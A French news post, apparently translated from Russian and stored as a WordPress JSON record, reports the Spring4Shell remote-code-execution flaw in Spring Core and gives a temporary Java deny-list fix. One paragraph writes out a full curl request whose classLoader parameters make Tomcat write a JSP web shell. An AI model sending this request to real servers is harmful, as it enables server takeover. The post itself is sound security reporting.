{"id":103660,"date":"2022-03-31T09:36:38","date_gmt":"2022-03-31T07:36:38","guid":{"rendered":"https:\/\/prohoster.info\/blog\/novosti-interneta\/kriticheskaya-0-day-uyazvimost-v-spring-framework-primenyaemom-vo-mnogih-java-proektah"},"modified":"2022-03-31T09:36:38","modified_gmt":"2022-03-31T07:36:38","slug":"kriticheskaya-0-day-uyazvimost-v-spring-framework-primenyaemom-vo-mnogih-java-proektah","status":"publish","type":"post","link":"https:\/\/prohoster.info\/fr\/blog\/news\/kriticheskaya-0-day-uyazvimost-v-spring-framework-primenyaemom-vo-mnogih-java-proektah","title":{"rendered":"Vuln\u00e9rabilit\u00e9 critique 0-day dans le Spring Framework, utilis\u00e9 dans de nombreux projets Java.","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>Une vuln\u00e9rabilit\u00e9 critique de type 0-day a \u00e9t\u00e9 identifi\u00e9e dans le module Spring Core, inclus dans le framework Spring Framework, permettant \u00e0 un attaquant distant non authentifi\u00e9 d'ex\u00e9cuter son code sur le serveur. Il n'est pas encore clair quelles pourraient \u00eatre les cons\u00e9quences catastrophiques de ce probl\u00e8me et si les attaques seront aussi massives que celles li\u00e9es \u00e0 la vuln\u00e9rabilit\u00e9 de Log4j 2. La vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 surnomm\u00e9e Spring4Shell, mais aucun identifiant CVE n'a encore \u00e9t\u00e9 attribu\u00e9. Dans Spring Framework, le probl\u00e8me demeure non corrig\u00e9 et plusieurs prototypes d'exploits fonctionnels sont d\u00e9j\u00e0 disponibles sur le Web (1, 2, 3, 4). La situation est aggrav\u00e9e par le fait que de nombreuses applications Java d'entreprise bas\u00e9es sur Spring Framework s'ex\u00e9cutent avec des privil\u00e8ges root, et la vuln\u00e9rabilit\u00e9 permet de compromettre compl\u00e8tement le syst\u00e8me.    <\/p>\n<p>Selon certaines estimations, le module Spring Core est utilis\u00e9 dans 74 % des applications Java. Le danger de cette vuln\u00e9rabilit\u00e9 est att\u00e9nu\u00e9 par le fait que seules les applications utilisant l'annotation @RequestMapping lors de la connexion des gestionnaires de requ\u00eates et la liaison des param\u00e8tres des formulaires web au format name=value (POJO, Plain Old Java Object) sont concern\u00e9es, plut\u00f4t que celles utilisant JSON\/XML.      <\/p>\n<p>Il n'est pas encore clair quelles applications Java et quels frameworks sont concern\u00e9s par ce probl\u00e8me. La vuln\u00e9rabilit\u00e9 emp\u00eache l'ajout des champs class, module et classLoader \u00e0 une liste noire ou l'utilisation explicite d'une liste blanche de champs autoris\u00e9s. L'exploitation de la vuln\u00e9rabilit\u00e9 est possible uniquement avec Java\/JDK 9 ou une version plus r\u00e9cente. Ce probl\u00e8me est caus\u00e9 par la possibilit\u00e9 de contourner la protection contre la vuln\u00e9rabilit\u00e9 CVE-2010-1622, corrig\u00e9e dans Spring Framework en 2010 et li\u00e9e \u00e0 l'ex\u00e9cution du gestionnaire classLoader lors de l'analyse des param\u00e8tres de la requ\u00eate.      <\/p>\n<p> Le fonctionnement de l'exploit consiste \u00e0 envoyer une requ\u00eate avec les param\u00e8tres class.module.classLoader.resources.context.parent.pipeline.first.*, dont le traitement entra\u00eene la cr\u00e9ation d'un fichier jsp dans le r\u00e9pertoire racine d'Apache Tomcat et l'\u00e9criture dans ce fichier du code sp\u00e9cifi\u00e9 par l'attaquant. Le fichier cr\u00e9\u00e9 devient accessible pour des requ\u00eates directes et peut \u00eatre utilis\u00e9 comme un web shell. Pour attaquer une application vuln\u00e9rable dans un environnement Apache Tomcat, il suffit d'envoyer une requ\u00eate avec des param\u00e8tres sp\u00e9cifiques \u00e0 l'aide de l'outil curl. curl -v -d \"class.module.classLoader.resources.context.parent.pipeline.first.pattern=code_\u00e0_ins\u00e9rer_dans_le_fichier &amp; class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp &amp; class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps\/ROOT &amp; class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar &amp; class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= \" http:\/\/localhost:8080\/springmvc5-helloworld-exmaple-0.0.1-SNAPSHOT\/rapid7              <\/p>\n<p>Le probl\u00e8me discut\u00e9 dans Spring Core ne doit pas \u00eatre confondu avec les vuln\u00e9rabilit\u00e9s r\u00e9cemment d\u00e9couvertes CVE-2022-22963 et CVE-2022-22950. Le premier probl\u00e8me concerne le package Spring Cloud et a \u00e9t\u00e9 corrig\u00e9 dans les versions 3.1.7 et 3.2.3. Le second probl\u00e8me existe dans Spring Expression et a \u00e9t\u00e9 corrig\u00e9 dans Spring Framework 5.3.17. Ce sont des vuln\u00e9rabilit\u00e9s fondamentalement diff\u00e9rentes. Concernant la nouvelle vuln\u00e9rabilit\u00e9, les d\u00e9veloppeurs de Spring Framework n'ont pas encore fait d'annonces ni publi\u00e9 de correctif.          <\/p>\n<p>Comme mesure temporaire de protection, il est recommand\u00e9 d'utiliser une liste noire de param\u00e8tres de requ\u00eate ind\u00e9sirables dans le code : import org.springframework.core.Ordered; import org.springframework.core.annotation.Order; import org.springframework.web.bind.WebDataBinder; import org.springframework.web.bind.annotation.ControllerAdvice; import org.springframework.web.bind.annotation.InitBinder; @ControllerAdvice @Order(10000) public class BinderControllerAdvice { @InitBinder public void setAllowedFields(WebDataBinder dataBinder) { String[] denylist = new String[]{ \"class.\", \"Class.\", \".class.\", \".Class.\"}; dataBinder.setDisallowedFields(denylist); } }<br \/>\n<br \/>Source : <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/www.opennet.ru\/opennews\/art.shtml?num=56941\">opennet.ru<\/a> <\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u0412 \u043c\u043e\u0434\u0443\u043b\u0435 Spring Core, \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c\u043e\u043c \u0432 \u0441\u043e\u0441\u0442\u0430\u0432\u0435 \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u0430 Spring Framework, \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u043c\u0443 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0441\u0432\u043e\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435. \u041f\u043e\u043a\u0430 \u043d\u0435 \u044f\u0441\u043d\u043e \u043d\u0430\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043a\u0430\u0442\u0430\u0441\u0442\u0440\u043e\u0444\u0438\u0447\u043d\u044b \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0438 \u0431\u0443\u0434\u0443\u0442 \u0430\u0442\u0430\u043a\u0438 \u0441\u0442\u043e\u043b\u044c \u0436\u0435 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u043c\u0438, \u043a\u0430\u043a \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e \u0432 Log4j 2. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d\u043e \u043a\u043e\u0434\u043e\u0432\u043e\u0435 \u0438\u043c\u044f Spring4Shell, \u043d\u043e CVE-\u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u043f\u043e\u043a\u0430 [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[702],"tags":[],"class_list":["post-103660","post","type-post","status-publish","format-standard","hentry","category-news"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.2 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u0412 \u043c\u043e\u0434\u0443\u043b\u0435 Spring Core, \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c\u043e\u043c \u0432 \u0441\u043e\u0441\u0442\u0430\u0432\u0435 \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u0430 Spring Framework, \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u043c\u0443 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0441\u0432\u043e\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/fr\/blog\/news\/kriticheskaya-0-day-uyazvimost-v-spring-framework-primenyaemom-vo-mnogih-java-proektah\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.2\" \/>\n\t\t<meta property=\"og:locale\" content=\"fr_FR\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Spring Framework, \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u043c\u043e\u043c \u0432\u043e \u043c\u043d\u043e\u0433\u0438\u0445 Java-\u043f\u0440\u043e\u0435\u043a\u0442\u0430\u0445 | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u0412 \u043c\u043e\u0434\u0443\u043b\u0435 Spring Core, \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c\u043e\u043c \u0432 \u0441\u043e\u0441\u0442\u0430\u0432\u0435 \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u0430 Spring Framework, \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u043c\u0443 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0441\u0432\u043e\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/fr\/blog\/news\/kriticheskaya-0-day-uyazvimost-v-spring-framework-primenyaemom-vo-mnogih-java-proektah\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2022-03-31T07:36:38+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2022-03-31T07:36:38+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Vuln\u00e9rabilit\u00e9 critique de type 0-day dans Spring Framework, utilis\u00e9 dans de nombreux projets Java | ProHoster","description":"Une vuln\u00e9rabilit\u00e9 critique de type 0-day a \u00e9t\u00e9 identifi\u00e9e dans le module Spring Core, inclus dans le framework Spring Framework, permettant \u00e0 un attaquant distant non authentifi\u00e9 d'ex\u00e9cuter son code sur le serveur.","canonical_url":"https:\/\/prohoster.info\/fr\/blog\/news\/kriticheskaya-0-day-uyazvimost-v-spring-framework-primenyaemom-vo-mnogih-java-proektah","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"fr_FR","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Spring Framework, \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u043c\u043e\u043c \u0432\u043e \u043c\u043d\u043e\u0433\u0438\u0445 Java-\u043f\u0440\u043e\u0435\u043a\u0442\u0430\u0445 | ProHoster","og:description":"\u0412 \u043c\u043e\u0434\u0443\u043b\u0435 Spring Core, \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c\u043e\u043c \u0432 \u0441\u043e\u0441\u0442\u0430\u0432\u0435 \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u0430 Spring Framework, \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u043c\u0443 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0441\u0432\u043e\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435.","og:url":"https:\/\/prohoster.info\/fr\/blog\/news\/kriticheskaya-0-day-uyazvimost-v-spring-framework-primenyaemom-vo-mnogih-java-proektah","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2022-03-31T07:36:38+00:00","article:modified_time":"2022-03-31T07:36:38+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"103660","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":"default","schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2022-03-31 07:37:59","updated":"2022-09-27 15:24:59","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/posts\/103660","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/comments?post=103660"}],"version-history":[{"count":0,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/posts\/103660\/revisions"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/media?parent=103660"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/categories?post=103660"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/tags?post=103660"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}